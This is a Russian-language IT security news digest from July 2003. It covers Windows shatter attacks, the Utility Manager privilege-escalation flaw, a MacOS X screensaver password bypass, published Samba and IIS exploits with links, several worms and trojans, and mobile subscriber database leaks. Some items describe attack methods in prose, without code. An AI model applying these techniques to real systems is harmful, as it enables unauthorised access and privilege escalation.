Целый класс атак, позволяющих злоумышленнику получить контроль над любым ПК или сервером, способен сделать беззащитными компьютерные системы в корпорациях и интернет-кафе. В так называемых shatter-атаках хакеры используют систему сообщений Windows для передачи запросов на выполнение кода привилегированными, но незащищенными приложениями. Они основаны на системе сообщений Windows — среде, через которую приложения и операционная система общаются друг с другом. Оливер Лейвери, независимый эксперт и автор работы, опубликованной в пятницу секьюрити-фирмой iDefense, утверждает, что, исправив обнаруженную в системе сообщений ошибку, Microsoft не изменила самой этой системы. Приложения, работающие с системными привилегиями, но не следующие правилам безопасности Microsoft, по-прежнему представляют опасность. «По-моему, в прошлом многие упускали из виду тот факт, что это не отдельная атака, а целый класс атак, — пишет Лейвери в интервью по e-mail. — Каждый случай shatter-атаки — это проблема, но не смертельная. Однако от того, что данная уязвимость присутствует во многих приложениях, включая компоненты самой Windows, проблема становится гораздо серьезнее». Для эксплуатации уязвимости требуется, чтобы пользователь системы выполнил код атакующего, поэтому многие не придали особого значения двум предостережениям, опубликованным в прошлом году. И неудивительно: подавляющее большинство домашних пользователей и так имеет полные права администратора на свои ПК. Однако многие корпорации создают для своих сотрудников учетные записи с ограниченными правами, а киоски, библиотеки и интернет-кафе обычно не позволяют пользователям модифицировать систему. В таких случаях атаки, нацеленные на повышение уровня привилегий, представляют особую опасность, утверждает Лейвери. Подробнее - http://www.zdnet.ru/?ID=303645
15/07/2003 16:47 Apple исправляет дыру в MacOS X.
По информации интернет-издания Security Supersite, компания Apple готовит к выпуску заплатку для операционной системы MacOS X. Эта заплатка должна ликвидировать дыру в компоненте Screen Effects, ответственном за работу хранителей экрана. Как и в случае с Windows, в MacOS можно присвоить скринсейверу пароль, который требуется ввести, чтобы прекратить демонстрацию заставки и показать рабочий стол. Как выяснилось, работу скринсейвера в MacOS Х можно прервать, и не зная пароля. Для этого нужно несколько минут удерживать клавишу на клавиатуре, а потом нажать Enter. В этом случае скринсейвер дает сбой, система прекращает его выполнение и открывает рабочий стол. Источник новости - compulenta.ru. Подробности - http://security.ziffdavis.com/article2/0,3973,1190349,00.asp
15/07/2003 16:02 Деструктивный вирус W32.HLLW.Niden.
Компания Symantec сообщает о появлении нового деструктивного вируса W32.HLLW.Niden. Он распространяется по электронной почте и пиринговым сетям. После активации вирус посылает фальшивое сообщение об ошибке, копирует себя в системные папки Windows и пытается удалить исполняемые файлы популярных антивирусных программ, брандмауэров, а также штатный редактор реестра Windows. Свои копии вирус рассылает по адресам из книги Outlook, а в теме сообщений упоминается бен Ладен. Опасность вируса органичивается имеющимися в его коде ошибками и тем, что он написан на Visual Basic и требует наличия в системе библиотек этого языка. Источник - http://www.symantec.com
15/07/2003 15:40 «Би Лайн» решит проблему с «восьмеркой» за счет абонентов?
Компания «Вымпелком», предоставляющая услуги сотовой связи под маркой «Би Лайн», намерена избавить своих абонентов и звонящих им людей от давней и самой большой головной боли – проблемы с «восьмеркой». Не секрет, что на федеральные номера этого оператора сложно дозвониться с московского городского телефона. Постоянная занятость и обрыв соединений объясняются нехваткой цифровых потоков между «Би Лайном», обслуживающим крупнейшую в Москве абонентскую базу, и МГТС. Однако, согласно сегодняшнему заявлению «Вымпелкома», эта проблема будет частично решена уже нынешним летом. Впрочем, в более отдаленной перспективе радость пользователей МГТС может омрачить неприятный сюрприз. До недавнего времени все звонки с городских номеров на федеральные номера «Би Лайна» проходили через сети МГТС и «Ростелекома», однако из-за увеличения объема абонентской базы имеющихся цифровых потоков постоянно не хватало. Чтобы решить данную проблему, «Би Лайн» начал искать дополнительные ресурсы для взаимодействия с сетью МГТС и в этом ему взялось помочь ЗАО «Межрегиональный ТранзитТелеком». В начале этого года был введен в коммерческую эксплуатацию московский локальный центр коммутации (ЛЦК) ЗАО «МТТ», предназначенный для обеспечения эффективного взаимодействия сетей фиксированной и подвижной телефонной связи на местном уровне, и часть трафика «Би Лайна» начала проходить по каналам МТТ. Введение ЛЦК на первом этапе, который продлится до конца лета, увеличит общее количество каналов для доступа абонентов МГТС в сеть «Би Лайн GSM» в Москве в четыре раза. Впрочем, все это не означает, что желающие позвонить с городского номера на «Би Лайн» немедленно почувствуют разницу. Сейчас введено в эксплуатацию только 50 дополнительных цифровых потоков. По словам первого заместителя генерального директора ЗАО «МТТ» Виталия Слизеня, качество соединений станет приемлемым только к концу августа, к этому времени планируется запустить еще 50 цифровых потоков. Переход трафика будет осуществляться постепенно, поскольку, по словам вице-президента по сетевому развитию «Вымпелкома» Сергея Авдеева, «на настройку сети требуется время». Подробности - http://www.cnews.ru/newtop/index.shtml?2003/07/15/146362
15/07/2003 14:32 Выход тестовой версии ядра Linux 2.6.0.
Cвершилось! Линус Торвальдс объявил о выпуске тестовой версии новой ветки ядра Linux - 2.6.0-test1. Версия выложена для предварительного ознакомления и тестирования для нахождения неизбежных багов. Естсественно, на критичных машинах (серверах) её ещё рано ставить. «Задача тестовых версий — привлечь к тестированию больше людей и дать некоторым неуемным разработчикам понять, что уже слишком поздно думать о следующей замечательной функции», — пишет он. Две недели назад Торвальдс предупредил о близком выходе — с некоторым опозданием — тестовых версий 2.6, а на прошлой неделе выпустил последнюю из рабочих версий 2.5. По словам Торвальдса, промежуток времени между выходом «pre1» и финальными версиями 2.6.0 операционной системы будет короче, чем при выпуске версии ядра 2.4, на котором основаны современные продукты Linux. «Одно отличие состоит в том, что если выхода финальной версии 2.4.0 с момента выхода pre1 ждали около семи месяцев, то при выпуске 2.6.0, я надеюсь (и уверен), мы столкнемся с меньшим количеством проблем». Подробности - http://www.ussg.iu.edu/hypermail/linux/kernel/0307.1/1805.html
14/07/2003 14:30 Уязвимость в Solaris.
Новая рассылка по безопасности от Sintelli начала работать по полной программе (мы вчера писали об открытии этого списка рассылки). Появилось сообщение об уязвимости в ОС Solaris - в функции работы с базами данных. Было обнаружено, что существует возможность выполнения переполнения буфера в функциях dbm_open(ndbm(3C) и dbm(3UCB)) и dbminit(3UCB). Эти уязвимости позволяют локально получить права суперпользователя. Sun Microsystems выпущены патчи дл яоостветсвующих версий Solaris: 2.6, 7, 8, 9. Патч - http://sunsolve.sun.com/pub-cgi/show.pl?target=patchpage
14/07/2003 14:27 Windows XP повышает надежность компьютеров.
Журнал PC Magazine опубликовал весьма подробный обзор, касающийся надежности домашних персональных компьютеров в США. В журнале постоянно получают жалобы на качество техники всех без исключения производителей. Меньше всего присылают жалоб на плохую работу компьютеров Apple и Dell. В журнале также отмечают, что компьютеры с ОС Windows XP работают значительно стабильнее ПК с Windows 95, 98 и Me, которые до появления Windows XP доминировали на рынке домашних ПК. 37% пользователей Windows XP указали на то, что их система никогда не "падала". В случае Windows 98 и Me эта величина составляет всего 7%. Надежность операционных систем Linux и MacOS еще выше, однако распространены они мало. Доля домашних компьютеров с Linux составляет в США около 1%, а MacOS установлена на ПК 2% участников опросов PC Magazine. Под управлением же Windows XP в США работают 44% домашних компьютеров. Подробности - http://www.pcmag.com/article2/0,4149,1185083,00.asp
14/07/2003 14:13 Рейтинг тем спамерских писем.
Американская компания FrontBridge Technologies, специализирующаяся на технологиях защиты электронной почты от спама и вирусов, опубликовала десятку самых популярных среди спамеров тем писем. Интересно, что в этот своеобразный хит-парад не попала ни одна тема, явно указывающая на спам: из разряда предложений купить "Виагру", дешевых ссуд и т.д. Абсолютное большинство спамеров маскируют свои послания под обычные деловые и дружеские письма. Стоит отметить, что подобная тенденция наблюдается и в России. На первом месте хит-парада FrontBridge находится тема Re: Information you asked for, которой примерно соответсвуют излюбленные отечественными спамерами темы "Re: запрос" и "Re: информация", на второй строчке находится тема Hey (русский эквивалент - "Привет"). Затем следуют темы Check this out! ("Зацени" или "Приколись"), Is this your email? ("Это твое письмо?"), Please resend the email ("Перешлите письмо"), Rе: your order ("Re: ваш заказ"), Past due account и Please verify your information ("Подтвердите информацию"). Все они подразумевают наличие между отправителем и получателем деловых или дружеских отношений. Подробнее - http://www.compulenta.ru/2003/7/14/40740/
14/07/2003 14:08 Недельный отчет о вирусах Panda Software.
Следуя своим старым традициям, компания Panda Software выпустила очередной еженедельный отчёт о вирсуной активности прошедшей недели. Отчет этой недели посвящен трояну IRC.Sx2 и двум червям, Graps и Ronoper.B. Более подробно о черве и двух вирусах можно прочитать по ссылке, приведённой ниже. Отчёт - http://www.viruslab.ru/press/index.php?go=show&num=177
14/07/2003 12:52 Netcraft: Ведущие провайдеры используют FreeBSD.
Как сообщает linux.org.ru, по данным Netcraft за июнь пятеро самых надёжных провайдеров хостинга используют FreeBSD. Cудя по всему, это должно свидетельствовать о большей защищённости этой разновидности *nix-ОС, хотя (IMHO) всё не настолько однозначно. Интересно было бы выяснить, как обстоит с этим дело в рунете. Отчёт Netcraft - http://www.theage.com.au/articles/2003/07/10/1057783256883.html
14/07/2003 11:50 IE 6 вышел в Рунете на первое место.
В июне произошла рокировка лидеров в состязании самых популярных браузеров аудитории российского Интернета. Как показывают статистические данные SpyLOG, в июне 2003 г. шестая версия Internet Explorer стала наиболее распространенной в Рунете: ею пользуется 46,3% пользователей Рунета против 45,3% у IE5.xx. Месяцем ранее, в июне, соотношение было иным: 46,6% у IE5.xx и 45,0% у IE6.xx. Аналогичные результаты выдает глобальная статистика HotLog. По ее данным, на сегодняшний день браузерами IE6.xx пользуется 57,66% аудитории Рунета, в то время как у IE5.xx 32,19% популярности. Пятая версия Internet Explorer доминировала в Рунете более 3,5 лет. Источник - http://www.runet.ru
14/07/2003 11:08 В Белоруссии прикрыли сайт с абонентской базой сотового оператора Velcom.
Если в Рунете предлагают купить базы данных сотовых операторов на CD, то в соседней Белоруссии до недавних пор существовал проект, предлагавший поиск по аналогичной базе местного оператора непосредственно в режиме онлайн. Как сообщает издание BelMedia, проект по адресу http://velik.org.by начал работу, предположительно, в прошлом месяце. Он предлагал всем желающим поиск по номеру или фамилии абонентов компании МЦС (торговая марка Velcom). Сервис был вполне функционален и выдавал правильные результаты. Журналисты BelMedia братились в пресс-службу Velcom с предложением "обозначить официальную позицию компании Velcom относительно данного сайта". Ответа не последовало, зато теперь по указанному выше адресу вместо сервиса висит одинокая надпись "Убрано". Источник - http://www.runet.ru
14/07/2003 10:39 Омский хакер нанес ущерб 15 клиентам местного провайдера.
Делом одного из студентов местного вуза занимается непосредственно Управление ФСБ в области. Хакер проходит по статье "Неправомерный доступ к компьютерной информации". По информации пресс-группы Омского УФСБ, используя специализированные утилиты, студент получил доступ к базе данных ряда организаций, в том числе к информации, содержащей пароли для подключения к Интернету. Следствие установило, что для неправомерного доступа в открытые телекоммуникационные системы "хакер" незаконно использовал регистрационные данные пятнадцати организаций, учреждений и частных лиц и нанес им при этом материальный ущерб, сообщает РИА "Новости". Источник - http://www.rian.ru/
13/07/2003 16:39 Вышел июльский номер журнала "Системный администратор".
Сообщается о выходе июльского номера журнала "Системный администратор". В номере: 1. Мониторинг Windows-серверов с помощью Nagios. Часть 1. 2. Стартовые скрипты FreeBSD. 3. Настройка сервера SSH. 4. IRC-сервер. 5. Три составных части защиты и др... Тем временем на сайте появились в онлайне статьи мартовского номера журнала. Подробности - http://www.samag.ru/
13/07/2003 15:43 Подробности уязвимости в Microsoft Utility Manager.
Стали известны подробности уязвимости в Microsoft Utility Manager, которая перекрывается патчем, описанном в MS03-025. Utility Manager –утилита достижимости (Accessibility), которая позволяет пользователям проверять состояние программ достижимости (Microsoft Magnifier, Narrator, On–Screen Keyboard), запускать и останавливать их. Нажимая комбинацию клавиш '+U', пользователь может запустить Windows Utility Manager. Процесс “utility manager”, запущенный процессом Winlogon, запускается с 'system' привилегиями в рабочем столе пользователя. Utility manager может быть также запущен перед входом в систему, нажимая +U. Главное окно Utility Manager управление ListView, которое отображает доступные средства достижимости (accessibility). Windows сообщения, посланные этому управлению, должным образом не проверяются, что позволяет атакующему выполнять множество опасных взаимодействий с процессом Utility Manager. Несколько интересных сообщений в этом контексте LVM_SORTITEMS и LVM_SORTITEMSEX сообщения, которые инструктируют управление “сортировать” содержание, основываясь на функции обратного вызова (callback function), адрес которой определен в сообщении. Изменяя текст окна, и затем посылая LVM_SORTITEMS сообщение в список управления, возможно заставить процесс Utility Manager выполнить код, представленный низко привилегированным пользователем. Этот код будет выполнен с привилегиями local 'system' учетной записи. Необходимый код эксплоита функционально эквивалентен предыдущему 'shatter' коду, с единственным существенным различием, являющимся в использовании 'LVM_SORTITEMS' сообщения, вместо 'WM_TIMER' сообщения. Уязвимость обнаружена в Windows 2000 SP3. Подробности - http://securitylab.ru/default.asp?ID=38807
13/07/2003 15:05 Когда появится в продаже база данных абонентов "БИ ЛАЙН"?
Как сообщает oxpaha.ru, по непроверенным данным в сотовой компании "Би лайн" произошла утечка абонентской базы. Как велика похищенная информация и когда торговцы пиратской продукцией начнут открыто предлагать "Полную базу данных столичных и федеральных абонентов "Би лайн", как это было с МТС, пока не известно. Напомним, что 22 января 2003 года в СМИ от секретаря крупнейшего сотового оператора России Евы Прокофьевой, поступила информация о том, что часть базы данных МТС похищена. База данных МТС, и по сей день свободно распространяющаяся пиратами, содержит такие персональные сведения об абонентах компании: ФИО, дата рождения, паспортные данные, адрес места жительства, ИНН, ОКОНХ, юридический адрес, контактный телефон (не мобильный), дата подписания контракта с МТС, прошедшие платежи. В базе реализован поиск по первым семи позициям. Ранее сообщалось, что по формату похищенной части базы данных невозможно было определить источник утечки. Сегодня торговцы рекламируют свой продукт как полную базу данных столичных и федеральных абонентов МТС т.е. речь идет примерно о 5,5 млн человек. По одной из версий база данных "утекла" через спецслужбы, так как во время октябрьской операции по освобождению заложников из театрального центра на Дубровке столичные сотовые операторы отключили на своих сетях функцию шифрования разговоров. Тем самым открыли спецслужбам доступ к своей базе данных. Что и могло произойти на днях после терракта в Тушине. Если информация о краже абонентской базы "Би лайн" в скором времени подтвердится, то у многих людей личная жизнь окажется "вывернутой" наружу для всеобщего обозрения. Источник - http://www.oxpaha.ru
13/07/2003 14:41 Ещё один эксплоит уязвимости в SAMBA.
Господин с интригующим ником Schizoprenic из турецкой Xnuxer-Research Laboratory опубликовал ещё один исходник эксплоита, использующего уязвимость в SAMBA версии ниже 2.2.8. Уязвимость была обнаружена в мае этого года Себастьяном Крамером из SuSE Security Audit Team и позволяла удалённо получить права суперпользователя. После опубликования сообщения об уязвимости были опубликованы эксплоиты такими командами, как: netric.org, 0x333.org, DigitalDefense. Как пишет сам автор, его больше всего заинтересовала программа под названием sambal.c, выпущенная Netric Security, поскольку использовала брутефорс метод, однако не обладала возможностью обратного соединения ( connectback mode ). Автор усовершенствовал эксплоит с введением этого метода, поскольку его использование позволяет обойти защиту файрволлов. Также введена возможность прослушивания произвольного порта для затруднения обнаружения эксплоита. Кроме того, автор ввёл возможность массового эксплоита, для чего в качестве IP-адреса жертв информация берётся из заранее сформированного файла. Эксплоит и описание - http://archives.neohapsis.com/archives/bugtraq/2003-07/0151.html
13/07/2003 14:26 Новый список рассылки по сетевой и компьютерной безопасности.
Компания Sintelli, занимающаяся компьютерной и сетевой безопасностью, объявила о начале выхода нового списка рассылки под названием SINTRAQ, цель которого, по словам авторов в оперативном оповещении подписчиков о последних уязвимостях, обнаруженнных в различных компонентах ОС и ПО. Объявлена формула 24x7x365, думаю, не требует пояснения. Свои анонсы об уязвимостях Sintelli называет Sintelli Security Alert. Сами анонсы базируются на сообщениях CVE, Buqtraq, Nessus and CERT. Подписка на список рассылки асболютна свободна и доступна со страницы компании. Как следует из анонса - основным примуществом нового списка рассылки должна стать оперативность - то есть сообщения об уязвимостях будут появляться сразу же - без всяких задержек. Насколько это окажется верным - покажет время. Несколько слов о самой компании. Базируется она в Великобритании и имеет офисы в Скандинавии и Индии. Список рассылки - http://www.sintelli.com
13/07/2003 13:13 Уязвимость в Adobe Acrobat Reader.
Paul Szabo с факультета математики и статистики университета Сиднея (Австралия) сообщает об обнаружении уязвимости в популярном PDF-вьювере, выпускаемом фирмой Adobe - Acrobat Reader. Уязвимость была обнаружена в версиях 5.0.5 и 5.0.7 операционной системы Linux (тестировалось в Debian (woody)), однако высказывается предположение о существовании уязвимости в других версиях Acroread (так он называется в *nix) и других типах UNIX-ОС. Уязвимость заключается в возможности выполнения переполнения буфера и последующего выполнения произвольного кода при включении в документ URL большой длины. При этом, естественно, необходимо, чтобы пользователь кликнул на эту ссылку. Примечательно то, что в вышедшей 17 июня версии 5.0.7 как раз устраняется эта уязвимость. Тем не менее, как показывают тесты уязвимость всё-таки осталась. Автором выпущен скрипт на Перле для демонстрации уязвимости. Код эксплоита послан CERT. В качестве времееной меры защиты предлагается удалить файл .../Reader/*/plug_ins/wwwlink.api. Источник - http://www.securitylab.ru
13/07/2003 12:49 Новый троян помогает распространять порнографию.
В списке рассылки BUGTRAQ Richard M. Smith описал новый тип трояна, основной задачей которого является превращение заражённого компьютера в посредник (прокси) для осуществления связи с платными порносерверами. Самым интересным в механизме работы трояна является то, что IP-адрес прокси (заражённого компьютера) изменяется каждые 10 минут посредством переключения на другой заражённый компьютер. Подобный механизм возможен в случае доступа человека, организовавшего заражение к базе данных DNS-сервера, который тоже устанавливается на один из заражённых компьютеров. Указывается также, что большая часть этих заражённых машин была использована в осуществлённой в течение 4-дневного уикенда в честь Дня Независимости США атаки на систему платежей PayPal для похищения паролей и номеров кредитных карт этой системы. Об этом писал новостной сайт Silicon.com ( http://silicon.com/news/500013-500001/1/5061.html ). Причём в самой статье явно указывается на Российский след в этой афёре. Joe Stewart из LURHQ выловил одну из копий трояна и обследовал её код, анализ которого был выложен на сайте команды LURHQ. Троян получил имя Migmaf. 11 июля о трояне также написала New York Times ( http://www.nytimes.com/2003/07/11/technology/11HACK.html?hp ). Указывается, что в качестве доменов были использованы следующие: onlycoredomains.com, pizdatohosting.com (занятное название - тоже может указывать на наших соотечественников ;)), bigvolumesites.com и др. При обследовании этих доменов было обнаружено около 100 IP-адресов, принадлежащих различных провайдерам, обслуживающим пользователей персональных компьютеров. Наибольшее количество принадлежит AOL.COM. Также интересной особенностью трояна является выбор компьютера с более "толстым" каналом - предпочтение отдаётся компьютерам на DSL-линиях. Механизм заражения пока не выяснен, однако автор высказывает предположение, что это может быть результатом действия трояна Sobig.e. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-07/0132.html Анализ кода - http://www.lurhq.com/migmaf.html
12/07/2003 14:15 PlayStation в качестве браузера.
Один из активных пользователей приставки PlayStation2 придумал способ ее использования в качестве интернет-браузера. Веб-дизайнер Мартин Брук обнаружил, что с помощью приставки можно посещать не только сайты, относящиеся к игровой империи Sony, но и практически любые другие страницы. Брук создал домашнюю страницу, которая позволяет пользователям PlayStation2 путешествовать по всемирной сети. На этот сайт уже направился стабильный поток посетителей. Sony открыла сетевой игровой сервис в Британии в июне. С его помощью геймеры могут играть против живых соперников через интернет. Как и другие операторы сетевых игровых услуг, Sony пытается направить всех пользователей на свой сайт. Однако Брук выяснил, что в меню приставки можно поменять адрес страницы, с которой она связывается в первую очередь. "Я заметил, что в интернет-адаптере можно изменить IP-адрес. Я решил, что туда можно вписать адрес интернет-страницы и создать на ней браузер", - говорит Брук. Его сайт www.brookfresh.co.uk оптимизирован для просмотра при помощи PlayStation2. Вверху каждой страницы есть адресная строка, чтобы облегчить пользователю навигацию. Этот суррогатный браузер в принципе должен отображать практически любые страницы. Вводить нужный адрес можно либо при помощи игрового контроллера, либо - что гораздо удобнее - при помощи клавиатуры, подключаемой через порт USB. Вскоре Брук планирует добавить на сайт возможность создавать свои собственные закладки, чтобы облегчить перемещение по интернету. После этого Брук намерен начать работу над почтовым сервисом. При этом на скорость соединения с интернетом при помощи PlayStation2 жаловаться не приходится - приставки могут использовать только высокоскоростные линии. Подробности - http://news.bbc.co.uk/hi/russian/sci/tech/newsid_3057000/3057047.stm
12/07/2003 13:09 Варезные сайты исключают из рейтингов и каталогов.
В Рунете созрел очередной скандал. В его основе лежит протест варезных сайтов против исключения их из популярных каталогов российского Интернета. Интересно, что сам процесс исключения варезников инициировали представители софтовых интернет-проектов. Ситуация в который раз обострила проблему выбора для пользователей Сети. События начали разворачиваться с того момента, как инициативная группа, состоящая из представителей софтовых сайтов, направила в популярные интернет-каталоги письмо с предложением исключить из них варезные интернет-проекты (download.ru, freesoft.ru, listsoft.ru, softsearch.ru etc.). В своем письме представители софтовых сайтов выразили мнение о том, что варезные сайты, занимающие верхние позиции рейтингов, способствуют распространению в русскоязычном Интернете нелегального софта, публикуя регулярно ссылки на кейгены и ключи к программам, за которые в нормальных условиях пользователю пришлось бы платить. По этой причине софтовики считают варезные сайты пятном на фоне Рунета, которое необходимо выводить. В ответ на обращение представители Mail.ru сообщили об удалении из каталога нескольких сайтов (в их число попали довольно известные проекты - newestsoft.com и kadets.ru). В отношении же nnm.ru, kpnemo.ru и rth77.ru был дан отрицательный ответ, - представители Mail.ru сочли, что на этих сайтах нет вареза. Администратор Rambler`s Top100 в ответ на обращение пообещал в ближайшее время проверить указанные сайты. Как сообщили нам инициаторы акции, ранее, когда Дмитрий Турецкий (listsoft.ru) писал про nnm.ru администратору рейтинга Rambler's Top100, то получил следующий ответ: "В Рейтинг не пускаются поисковики crack-ов. Сайт nnm.ru - это прежде всего новостная лента "софтово-железно-развлекательной" тематики". Обсуждение возможности исключения варезных сайтов из каталога "Яндекса" можно посмотреть здесь. Подробнее - http://www.runet.ru/events/3418.html
12/07/2003 12:31 Ещё один эксплоит уязвимости в IIS.
Опубликован ещё один исходник эксплоита в компоненте WebDAV Вэб-сервера от M$ IIS 5.0. Автор - Xnuxer Lab. Отличается от предыдущих тем, что не требует запуска nc (netcat) или телнета. Предназначен для *nix-платформ. Язык - Си. Эксплоит - http://archives.neohapsis.com/archives/bugtraq/2003-07/0065.html
12/07/2003 12:00 Спамеры эксплуатируют доброе имя Билла Гейтса.
Билл Гейтс удостоился сомнительной чести – его имя чаще всего встречается в заголовках спамерских писем-розыгрышей с предложениями сказочно разбогатеть, рассылаемых аферистами в поисках доверчивых простофиль. В рейтинге антивирусной компании Sophos среди самых распространенных «писем счастья», скрытых вирусов-троянов и посланий аферистов на первое место попало рассылаемое по электронной почте письмо, где получателю предлагается часть солидного состоянии Билла Гейтса. Спамерское послание призывает получателя переслать это письмо всем своим знакомым и родственникам, чтобы получить свою долю денег самого богатого человека ИТ-сектора. Это своеобразное «письмо счастья» уже не первый год благополучно блуждает по почтовым ящикам. О подобных письмах-розыгрышах знают, кажется, уже все; они стали часть современной культуры, предметом для шуток в компаниях, на радио и телевидении. Остается непонятным – почему же люди до сих пор поддаются на спамерские розыгрыши, поневоле становясь спамерами? Грэхем Клули (Graham Cluley), старший консультант по технологиям в компании Sophos, отмечает: "Когда люди получают такого рода письма, набранные красивым шрифтом, по электронной почте, они скорее обратят на них внимание на их содержание, чем, если бы, к примеру, какой-то ненормальный рассказал бы им об этом в очереди на автобусной остановке. Они рассылают их дальше по собственной доброй воле». Источник - http://www.cnews.ru
12/07/2003 11:57 Задержан "отец" воронежского видеопиратства.
Три с половиной тысячи DVD–дисков общей стоимостью $20 тыс. были изъяты в результате спецоперации воронежского УБЭП. Одновременно во всех торговых точках, принадлежащих местному предпринимателю, имя которого в интересах следствия не называется, были произведены контрольные закупки, а экспертиза показала, что все изъятые диски контрафактные. "Это один из частных предпринимателей, который давно занимается продажей аудио- и видеопродукции. Он установил связь с одним из нелегальных заводов в Москве и через интернет постоянно заказывает и реализует здесь DVD", - сообщил ГТРК "Воронеж" заместитель начальника отдела УБЭП Воронежской области Юрий Попов. Известно, что молодой человек был первопроходцем на воронежском рынке контрафактной продукции. Несколько лет назад он первым начал торговать компьютерными дисками. А полгода назад наладил продажу DVD. Подделки очень низкого качества, зато и стоит такой диск всего лишь 200 рублей: в 3-4 раза дешевле настоящего. «На этих дисках часто присутствует наложение английской речи на русскую; варьируются названия фильмов. И оформление дисков оставляет желает лучшего», - поясняет эксперт-фоноскопист Роман Кочетов. В отношении бизнесмена возбуждено уголовное дело. Ему грозит до 5 лет лишения свободы или штраф от 20 до 40 тысяч рублей. А изъятые диски по решению суда могут быть конфискованы и уничтожены. Кроме того, видеопирату придется отвечать за нанесение ущерба правообладателю – одной из московских компаний. По предварительным оценкам, ущерб этот составляет миллион рублей. Источник - http://www.vesti.ru
12/07/2003 11:21 Экспортирование БД пользователей из MS Exchange в Postfix.
В статье Steve Friedl "Exporting MS Exchange 5.5 Users to Postfix" из раздела "Unixwiz.net Tech Tips" описана процедура ипортирования базы данных пользователей из почтовой системы MS Exchange в Postfix, применяемой в среде открытых систем. При рассмотрении процедуры рассматривается следующий набор софта: Microsoft Exchange 5.5 SP4, Van Dyke Technologies "SecureCRT" 4.x, Red Hat Linux 8.0, Postfix 2.0.9, OpenSSH 3.5. Автор рассматривает Postfix в качестве внешнего почтового шлюза с последующей передаче почты пользователям MS Exchange-серверу, применяемому во внутренней (интранет) сети. Статья - http://www.unixwiz.net/techtips/postfix-exchange-users.html
12/07/2003 10:18 Lindows предлагает простую в установке версию Linux.
В четверг компания объявила, что ее новый продукт LindowsCD предназначен для тех, кто хочет попробовать Linux, не заменяя и не удаляя операционной системы, работающей на их компьютерах. Владельцам полной версии LindowsOS 4.0 версия Linux OS CD предоставляется бесплатно, остальные могут купить CD за 29,95 $. Сжатая версия LindowsOS 4.0 обеспечивает многие стандартные функции ОС, включая Microsoft-совместимые бизнес-приложения и мультимедийную поддержку для MP3, Real Audio и Flash. Кроме того, она позволяет обращаться к файлам Microsoft Word, PowerPoint и Excel без дополнительного ПО. «У пользователей не всегда есть лишний компьютер, чтобы попробовать (Linux), — говорится в заявлении генерального директора Lindows Майкла Робертсона. — Пользователям LindowsCD, когда они закончат работу, достаточно просто вынуть CD, перезапустить компьютер, и он вернется в исходное состояние». Компания предполагает возможность устанавливать LindowsCD и в учебных заведениях, где Linux может использоваться только часть времени. Однако аналитики по-прежнему не уверены, что Linux готова к массовому применению. Подробности - http://zdnet.com.com/2100-1104_2-1024474.html
11/07/2003 03:16 Новая версия PE Tools 1.5.109. Что нового
+ Добавлены новые приоритеты процессов, Above Normal и Below Normal (только для Win2k/XP) + Добавлена кнопка "?" для SizeOfImage + Добавлено отображение статуса SoftICE (Loaded/Not Loaded) + Добавлен File Location Calculator + Добавлена возможность редактирования Load Config Directory + Переработан алгоритм обработки таблицы импорта (Tnx: Volodya/WASM.RU) + Обновилась база сигнатур для PE Sniffer-а, до 339 сигнатур (Tnx: .Cryorb & BiDark) + PE Sniffer теперь позволяет сканировать директории + Новые опции в PE Sniffer-е: Directory Scan: Skip invalid PE files, Directory Scan: Scan subfolders + Немного изменён формат базы сигнатур (Signs.txt) + Оптимизированна процедура идентификации сигнутур + Добавлены дополнительные настройки: - General: Drag'n Dropped files are...for the PE Sniffer - PE Sniffer: Register Shell Extension - Task Viewer: Force RAW mode, Display SoftICE status - PE Rebuilder: Register Shell Extension + Исправлены некоторые косметические баги + Исправлены баги в модуле обновления (UUpdateSystem.dll) + Исправлено несколько мелких багов + Исправлен баг обработки командной строки + Добавлены новые команды, для работы с программой из командной строки: "/PESNIFFER", "/REBUILDPE". Скачать новую версию можно здесь: http://www.uinc.ru/scripts/load.cgi?files/neox/PE_Tools.zip
11/07/2003 13:39 Выход ядра Linux 2.5.75.
Как сообщает linux.org.ru, сегодня Линус Торвальдс выпустил последнее ядро в ветке 2.5 - 2.5.75, теперь эту ветку переименуют в 2.6-pre и контроль над ней переходит в Руки Andrew Morton'а. Изменения включают в себя anticipatory scheduler и всякие разные фиксы. Линус предполагает что 2.6.0 может появиться уже через несколько месяцев, но определенно уже в этом году. В 2.5.75 все еще достаточно мест требующих прикладывания определенных усилий до того как мы сможем увидеть 2.6.0. Так же в дальше в треде можно увидеть как Linus об'ясняет чем плохо хранить kernel и еще кучу userspace кода в одном дереве (ala *BSD "world") и как это тормозит развитие и мешает инновациям. Релиз - http://marc.theaimsgroup.com/?l=linux-kernel&m=105787192005635&w=2
11/07/2003 13:10 Троян, делающий компьютер непригодным к использованию.
Компания Symantec сообщила о появлении новой троянской программы W32.Laorenshen.Trojan, представляющей достаточно серьезную опасность для пользователей ПК. Будучи активирован, троян модифицирует реестр, ассоциируя себя с файлами распространенных типов (.exe, .zip, .avi, .mp3, .dat и других). В результате, при запуске таких файлов демонстрируется окно с бесполезным набором символов. Использовать компьютер из-за этого становится практически невозможно. Кроме того, троян постепенно удаляет с компьютера файлы, выбирая их случайным образом. W32.Laorenshen.Trojan распространяется по электронной почте и пока редко встречается в "диком" виде. Источник - http://www.symantec.com
11/07/2003 13:03 Опасный почтовый червь W32.Jantic@mm.
Компания Symantec предупреждает о появлении нового опасного почтового червя W32.Jantic@mm. Он представляет собой программу на языке Visual Basic и совершает на компьютере деструктивные действия, пытаясь удалить все файлы с расширением .exe в системных папках Windows и в папке программы Yahoo Messenger. Кроме того, червь рассылает свои копии по электронной почте, используя контакты из адресной книги программы Outlook Express. Червь приходит в письме с темой "You have recieved a E-Card! Check your attatchments!" и вложенным файлом attachment.exe, маскируясь под электронную открытку. Источник - http://www.compulenta.ru
11/07/2003 12:57 Электронная коммерция опасна для кошелька?
